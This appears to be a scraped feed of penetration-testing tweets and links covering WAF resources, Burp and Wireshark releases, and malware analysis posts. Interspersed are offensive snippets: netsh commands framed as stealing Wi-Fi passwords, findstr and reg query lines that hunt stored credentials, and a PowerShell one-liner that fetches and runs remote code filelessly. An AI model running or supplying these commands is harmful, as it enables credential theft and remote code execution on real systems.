GitHub - 0xInfection/Awesome-WAF: 🔥 A curated list of awesome web-app firewall (WAF) stuff.
https://github.com/0xInfection/Awesome-WAF

Need to steal the password to a wireless network? Have access to Windows 8 or 10 box?

1) netsh wlan show profiles
2) netsh wlan show profile name=WIFI_NAME key=clear
3) Look for the “Key Content” line, the cleartext password will be there.

Wireshark 3.0.0 Released! https://t.co/B9lA0GdpzC

Wordpress Scanners collection:-
https://t.co/q3s23QBKp2
https://t.co/8cPeIHZJ3i
https://t.co/7e0Bi62JWN
https://t.co/MPgMWMiWkI
https://t.co/DoYZuEuT6M
https://t.co/GaZAmoguiH

Day 59: Windows API for Pentesting (Part 1) – int0x33 – Medium
https://medium.com/@int0x33/day-59-windows-api-for-pentesting-part-1-178c6ba280cb

Analyzing a Windows DHCP Server Bug (CVE-2019-0626) - MalwareTech
https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html

Arbitrary File Reading in Next.js < 2.4.1 – Arseny Reutov – Medium
https://raz0r.name/vulnerabilities/arbitrary-file-reading-in-next-js-2-4-1/

Released a very special v2.18 - "Jackass" bettercap

https://t.co/I89btKAe4y

File upload vulnerability scanner and exploitation tool.
https://t.co/JoQu6EQz6Y

Credentials & lateral movement

findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki

Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html

Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767

MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5

Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net

Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3

Apktool v2.4.0 Released
https://connortumbleson.com/2019/03/03/apktool-v2-4-0-released/

Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.

Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane

Powershell + COM fileless download exec alternative:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;

You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.

And set the proxy using setProxy() method.

Creating a Simple Free Malware Analysis Environment - MalwareTech
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html